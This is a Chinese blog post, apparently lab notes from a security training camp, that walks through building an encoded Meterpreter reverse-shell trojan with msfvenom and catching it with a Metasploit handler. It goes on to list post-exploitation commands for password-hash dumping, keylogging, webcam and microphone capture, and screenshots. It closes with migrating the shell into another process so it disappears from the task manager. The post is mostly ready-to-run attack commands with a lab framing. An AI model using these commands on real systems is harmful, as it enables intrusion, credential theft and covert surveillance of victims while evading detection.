蓝盾实训营day7——meterpreter木马生成和利用

meterpreter木马生成和利用

木马生成

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.188.5 lport=5555 -f exe > shell.exe

lhost 本地ip
lport 本地端口

命令完成后,会在当前目录下生成一个shell.exe可执行文件。

木马利用

获取Shell

先打开数据库服务:
service postgresql start

进入msf控制台:
msfconsole

选择攻击模块:
use exploit/multi/handler

选择payload:
set payload windows/meterpreter/reverse_tcp

show options查看需要配置的参数

设置上述生成木马时填写的ip和端口:
set lhost [本地ip]
set lport [本地端口]

执行:
run

然后就等待靶机的上线了:
这里写图片描述

打开xp靶机,运行我们生成的shell,然后控制端就会进入:
meterpreter >

然后我们就可以输入攻击指令了,比如shell,可以进入xp靶机的cmd命令模式。

常用攻击指令

以下给出一些常用的meterpreter攻击指令:

help 帮助
ps   查看进程
kill [pid] 杀死进程
可以通过ls、cd、cat等进行文件管理
hashdump 账号密码MD5
getuid 当前用户
sysinfo 系统信息

record_mic 记录麦克风
webcam_chat
webcam_list
webcam_snap 摄像头拍照
webcam_stream

keyscan_start 记录键盘
keyscan_dump 输出键盘记录
screenshot  截屏

后台运行

在meterpreter界面可以用以下指令把当前shell放到后台,然后通过run继续获得其他靶机的shell:

meterpreter > backgroud  把当前shell移到后台
msf exploit(handler) > sessions 查看所有后台
msf exploit(handler) > sessions [id] 进入指定id的后台

这里写图片描述

进程注入

注入其他进程:

先用ps查看所有进程的pid,然后输入命令migrate [pid] 将shell进程注入到其他指定进程,这样在任务管理器里就看不到我们的shell.exe了,它会跟随被注入的进程一直运行。

这里写图片描述

猜你喜欢

转载自blog.csdn.net/mingC0758/article/details/81076155
今日推荐